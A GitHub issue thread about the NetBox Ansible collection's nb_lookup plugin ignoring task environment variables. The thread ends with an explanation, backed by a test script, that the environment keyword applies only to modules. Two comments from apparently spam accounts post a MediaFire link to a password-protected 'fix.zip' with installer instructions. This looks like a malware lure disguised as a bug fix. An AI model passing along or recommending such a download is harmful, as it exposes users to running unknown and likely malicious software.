### ISSUE TITLE
[Bug]: ansible environment variables are ignored in lookup plugin

### ISSUE THREAD

**Issue by tanji** [netbox-community/ansible_modules#1302]
### Ansible NetBox Collection version

v3.19.1

### Ansible version

```bash
ansible [core 2.17.3]
  config file = /home/guillaume/.ansible.cfg
  configured module search path = ['/home/guillaume/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules']
  ansible python module location = /usr/lib/python3.12/site-packages/ansible
  ansible collection location = /home/guillaume/.ansible/collections:/usr/share/ansible/collections
  executable location = /home/guillaume/.local/bin/ansible
  python version = 3.12.4 (main, Jun  7 2024, 06:33:07) [GCC 14.1.1 20240522] (/usr/bin/python)
  jinja version = 3.1.4
  libyaml = True
```

### NetBox version

v3.7.0

### Python version

3.11

### Steps to Reproduce

Run this playbook:

```yaml
    - name: obtain list of devices from netbox
      debug:
        msg: >
          "Device {{ item }}"
      loop: "{{ query('netbox.netbox.nb_lookup', 'devices', api_filter='cluster=any-existing-cluster') }}" 
      environment:
        NETBOX_URL: "https://netbox.yourdomain.com"
        NETBOX_TOKEN: "foobar"
```

### Expected Behavior

Connection to netbox should be established.

### Observed Behavior

```
exception during Jinja2 execution: Traceback (most recent call last):
  File "/usr/lib/python3.12/site-packages/ansible/template/__init__.py", line 856, in _lookup
    ran = instance.run(loop_terms, variables=self._available_variables, **kwargs)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/guillaume/.ansible/collections/ansible_collections/netbox/netbox/plugins/lookup/nb_lookup.py", line 436, in run
    netbox = pynetbox.api(
             ^^^^^^^^^^^^^
  File "/usr/lib/python3.12/site-packages/pynetbox/core/api.py", line 74, in __init__
    base_url = "{}/api".format(url if url[-1] != "/" else url[:-1])
                                      ~~~^^^^
TypeError: 'NoneType' object is not subscriptable
```

The error happens because `url` is most likely empty.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ksaegusa** [comment]
Hello Tanji,

I was also interested in this issue and decided to investigate further. According to the documentation, it seems that the environment directive is only supported by modules.
https://docs.ansible.com/ansible/latest/reference_appendices/playbooks_keywords.html

I created a simple script to test this, and it appears that the environment is not being applied as expected. Therefore, it might be necessary to consider not supporting environment in nb_lookup.

## sample_lookup.py
```py
import os
from ansible.plugins.lookup import LookupBase

class LookupModule(LookupBase):
    def run(self, terms, variables=None, **kwargs):
        results = [os.getenv("TESTENV"),os.getenv("ENVTEST")]
        return results
```

## sample playbook
```
---
- hosts: localhost
  gather_facts: false
  tasks:
    - name: test ng
      debug:
        msg: "{{ lookup('sample_lookup') }}"
      environment:
        TESTENV: hogehoge
        ENVTEST: gehogeho

    - name: test ng
      debug:
        msg: "{{ lookup('env', 'TESTENV') }}"
      environment:
        TESTENV: hogehoge
        ENVTEST: gehogeho
  
    - name: test ok
      shell: printenv TESTENV
      environment:
        TESTENV: hogehoge
        ENVTEST: gehogeho
      register: result

    - debug:
        msg: "{{ result.stdout }}"
```

## result
```
$ uv run ansible-playbook sample.yml 
[WARNING]: No inventory was parsed, only implicit localhost is available
[WARNING]: provided hosts list is empty, only localhost is available. Note that the implicit
localhost does not match 'all'

PLAY [localhost] ******************************************************************************

TASK [test ng] ********************************************************************************
ok: [localhost] => {
    "msg": [
        null,
        null
    ]
}

TASK [test ng] ********************************************************************************
ok: [localhost] => {
    "msg": ""
}

TASK [test ng] ********************************************************************************
changed: [localhost]

TASK [debug] **********************************************************************************
ok: [localhost] => {
    "msg": "hogehoge"
}

PLAY RECAP ************************************************************************************
localhost                  : ok=4    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
```

**Comment by tanji** [comment]
@ksaegusa TIL! it seems it's working as documented then. Thanks for looking into it.
